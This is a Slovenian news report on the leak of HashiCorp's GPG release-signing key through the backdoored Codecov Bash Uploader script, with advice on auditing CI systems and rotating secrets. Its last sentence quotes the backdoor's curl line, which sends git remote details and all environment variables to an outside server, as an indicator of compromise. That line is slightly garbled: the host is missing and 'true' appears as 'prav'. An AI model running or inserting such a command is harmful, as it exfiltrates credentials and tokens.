HashiCorp, znan po razvoju odprtokodnih orodij Vagrant, Packer, Nomad in Terraform, je napovedal uhajanje zasebnega ključa GPG, ki se uporablja za ustvarjanje digitalnih podpisov, ki preverjajo izdaje. Napadalci, ki so pridobili dostop do ključa GPG, bi lahko skrito spremenili izdelke HashiCorp tako, da bi jih preverili s pravilnim digitalnim podpisom. Hkrati je družba izjavila, da med revizijo ni bilo ugotovljenih sledi poskusov takšnih sprememb.
Trenutno je bil ogroženi ključ GPG preklican in namesto njega uveden nov ključ. Težava je vplivala samo na preverjanje z uporabo datotek SHA256SUM in SHA256SUM.sig in ni vplivala na ustvarjanje digitalnih podpisov za pakete DEB in RPM za Linux, dobavljene prek releases.hashicorp.com, kot tudi na mehanizme preverjanja izdaje za macOS in Windows (AuthentiCode) .
Do uhajanja je prišlo zaradi uporabe skripta Codecov Bash Uploader (codecov-bash) v infrastrukturi, zasnovanega za prenos poročil o pokritosti iz sistemov za neprekinjeno integracijo. Med napadom na podjetje Codecov so bila v določeno skripto skrita stranska vrata, preko katerih so bila poslana gesla in šifrirni ključi na strežnik napadalcev.
Za vdor so napadalci izkoristili napako v procesu ustvarjanja slike Codecov Docker, ki jim je omogočila ekstrahiranje podatkov o dostopu do GCS (Google Cloud Storage), potrebnih za spreminjanje skripta Bash Uploader, distribuiranega iz codecov.io Spletna stran. Spremembe so bile izvedene 31. januarja, dva meseca so ostale neodkrite in so napadalcem omogočile pridobivanje informacij, shranjenih v sistemskih okoljih stalne integracije strank. Z uporabo dodane zlonamerne kode bi lahko napadalci pridobili informacije o preizkušenem repozitoriju Git in vseh spremenljivkah okolja, vključno z žetoni, šifrirnimi ključi in gesli, ki se prenašajo v sisteme za neprekinjeno integracijo, da organizirajo dostop do aplikacijske kode, repozitorijev in storitev, kot sta Amazon Web Services in GitHub.
Poleg neposrednega klica je bila skripta Codecov Bash Uploader uporabljena kot del drugih nalagalnikov, kot so Codecov-action (Github), Codecov-circleci-orb in Codecov-bitrise-step, katerih uporabnike prav tako prizadene težava. Vsem uporabnikom codecov-bash in sorodnih izdelkov priporočamo, da revidirajo svoje infrastrukture ter spremenijo gesla in šifrirne ključe. Prisotnost stranskih vrat v skriptu lahko preverite s prisotnostjo vrstice curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http:// /upload/v2 || prav
Vir: opennet.ru